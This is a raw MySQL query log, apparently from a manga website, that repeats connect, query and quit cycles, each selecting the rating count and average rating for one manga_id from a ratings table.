Quit 330642216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330642216 Quit 330642217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330642217 Quit 330642218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330642218 Quit 330642219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330642219 Quit 330642220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330642220 Quit 330642221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330642221 Quit 330642222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330642222 Quit 330642223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330642223 Quit 330642224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330642224 Quit 330642225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330642225 Quit 330642226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330642226 Quit 330642227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330642227 Quit 330642228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330642228 Quit 330642229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330642229 Quit 330642230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330642230 Quit 330642231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330642231 Quit 330642232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330642232 Quit 330642233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330642233 Quit 330642234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330642234 Quit 330642235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330642235 Quit 330642236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330642236 Quit 330642237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330642237 Quit 330642238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330642238 Quit 330642239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330642239 Quit 330642240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330642240 Quit 330642241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330642241 Quit 330642242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330642242 Quit 330642243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330642243 Quit 330642244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330642244 Quit 330642245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330642245 Quit 330642246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330642246 Quit 330642247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330642247 Quit 330642248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330642248 Quit 330642249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330642249 Quit 330642250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330642250 Quit 330642251 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330642251 Quit 330642252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330642252 Quit 330642253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330642253 Quit 330642254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330642254 Quit 330642255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330642255 Quit 330642256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330642256 Quit 330642257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330642257 Quit 330642258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330642258 Quit 330642259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330642259 Quit 330642260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330642260 Quit 330642261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330642261 Quit 330642262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330642262 Quit 330642263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330642263 Quit 330642264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330642264 Quit 330642265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330642265 Quit 330642266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330642266 Quit 330642267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330642267 Quit 330642268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330642268 Quit 330642269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330642269 Quit 330642270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330642270 Quit 330642271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330642271 Quit 330642272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330642272 Quit 330642273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330642273 Quit 330642274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330642274 Quit 330642275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330642275 Quit 330642276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330642276 Quit 330642277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330642277 Quit 330642278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330642278 Quit 330642279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330642279 Quit 330642280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330642280 Quit 330642281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330642281 Quit 330642282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330642282 Quit 330642283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330642283 Quit 330642284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330642284 Quit 330642285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330642285 Quit 330642286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330642286 Quit 330642287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330642287 Quit 330642288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330642288 Quit 330642289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330642289 Quit 330642290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330642290 Quit 330642291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330642291 Quit 330642292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330642292 Quit 330642293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330642293 Quit 330642294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330642294 Quit 330642295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642295 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330642295 Quit 330642296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330642296 Quit 330642297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330642297 Quit 330642298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330642298 Quit 330642299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330642299 Quit 330642300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330642300 Quit 330642301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330642301 Quit 330642302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330642302 Quit 330642303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330642303 Quit 330642304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330642304 Quit 330642305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330642305 Quit 330642306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330642306 Quit 330642307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330642307 Quit 330642308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330642308 Quit 330642309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330642309 Quit 330642310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330642310 Quit 330642311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330642311 Quit 330642312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330642312 Quit 330642313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330642313 Quit 330642314 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330642314 Quit 330642315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330642315 Quit 330642316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330642316 Quit 330642317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330642317 Quit 330642318 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330642318 Quit 330642319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330642319 Quit 330642320 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330642320 Quit 330642321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330642321 Quit 330642322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330642322 Quit 330642323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330642323 Quit 330642324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330642324 Quit 330642325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330642325 Quit 330642326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330642326 Quit 330642327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330642327 Quit 330642328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330642328 Quit 330642329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330642329 Quit 330642330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330642330 Quit 330642331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330642331 Quit 330642332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642332 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330642332 Quit 330642333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330642333 Quit 330642334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330642334 Quit 330642335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330642335 Quit 330642336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330642336 Quit 330642337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330642337 Quit 330642338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642338 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330642338 Quit 330642339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330642339 Quit 330642340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642340 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330642340 Quit 330642341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330642341 Quit 330642342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330642342 Quit 330642343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330642343 Quit 330642344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330642344 Quit 330642345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330642345 Quit 330642346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330642346 Quit 330642347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330642347 Quit 330642348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330642348 Quit 330642349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330642349 Quit 330642350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330642350 Quit 330642351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330642351 Quit 330642352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330642352 Quit 330642353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330642353 Quit 330642354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330642354 Quit 330642355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330642355 Quit 330642356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330642356 Quit 330642357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330642357 Quit 330642358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330642358 Quit 330642359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330642359 Quit 330642360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330642360 Quit 330642361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330642361 Quit 330642362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330642362 Quit 330642363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330642363 Quit 330642364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330642364 Quit 330642365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330642365 Quit 330642366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330642366 Quit 330642367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330642367 Quit 330642368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330642368 Quit 